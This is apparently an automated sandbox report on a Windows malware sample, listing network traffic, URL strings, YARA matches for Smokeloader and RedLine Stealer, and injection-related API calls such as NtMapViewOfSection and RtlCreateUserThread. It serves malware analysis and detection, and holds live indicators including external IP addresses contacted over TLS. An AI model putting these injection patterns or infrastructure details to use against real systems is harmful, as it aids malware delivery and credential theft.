              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:19:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:19:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:20:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:20:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:20:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:20:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: 89ED.exe.1.drString found in binary or memory: http://brightdata.com
              Source: 89ED.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: 89ED.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: 89ED.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: 89ED.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: 89ED.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: 89ED.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: 89ED.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: 89ED.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: 89ED.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
              Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.000000000982D000.00000004.00000001.00020000.00000000.sdmp, 89ED.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
              Source: 89ED.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: 89ED.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: 89ED.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
              Source: explorer.exe, 00000001.00000000.1771459949.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
              Source: explorer.exe, 00000001.00000000.1771459949.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
              Source: explorer.exe, 00000001.00000000.1771673269.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1769472585.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1768885292.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
              Source: 89ED.exe, 00000007.00000002.2479804876.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, 89ED.exe.1.drString found in binary or memory: http://sourceforge.net/projects/s-zipsfxbuilder/)
              Source: explorer.exe, 00000001.00000000.1773173699.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: 89ED.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: explorer.exe, 00000001.00000000.1773173699.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
              Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
              Source: explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
              Source: explorer.exe, 00000001.00000000.1773173699.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
              Source: explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
              Source: explorer.exe, 00000001.00000000.1765063451.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1764591589.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 00000001.00000000.1770604413.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 00000001.00000000.1770604413.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
              Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
              Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
              Source: explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
              Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
              Source: explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
              Source: explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000001.00000000.1773173699.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
              Source: explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
              Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
              Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49792 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 217.197.91.145:443 -> 192.168.2.4:49843 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 12.3.bbdeaec.5c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.C12E.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.C12E.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.bbdeaec.5a0e67.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.bbdeaec.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.C12E.exe.2170000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.2690701719.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.2348513596.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: 00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_00403043 RtlCreateUserThread,NtTerminateProcess,6_2_00403043
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014C4
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_00401508 NtAllocateVirtualMemory,6_2_00401508
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004014CF NtAllocateVirtualMemory,6_2_004014CF
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015D5
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004014DE NtAllocateVirtualMemory,6_2_004014DE
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015DF
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015E6
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015F2
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004014F5 NtAllocateVirtualMemory,6_2_004014F5
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004014F8 NtAllocateVirtualMemory,6_2_004014F8
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004014FB NtAllocateVirtualMemory,6_2_004014FB
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_00403043 RtlCreateUserThread,NtTerminateProcess,12_2_00403043
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_004014C4
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_00401508 NtAllocateVirtualMemory,12_2_00401508
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_004014CF NtAllocateVirtualMemory,12_2_004014CF
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_004015D5
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_004014DE NtAllocateVirtualMemory,12_2_004014DE
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_004015DF
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_004015E6
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_004015F2
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_004014F5 NtAllocateVirtualMemory,12_2_004014F5
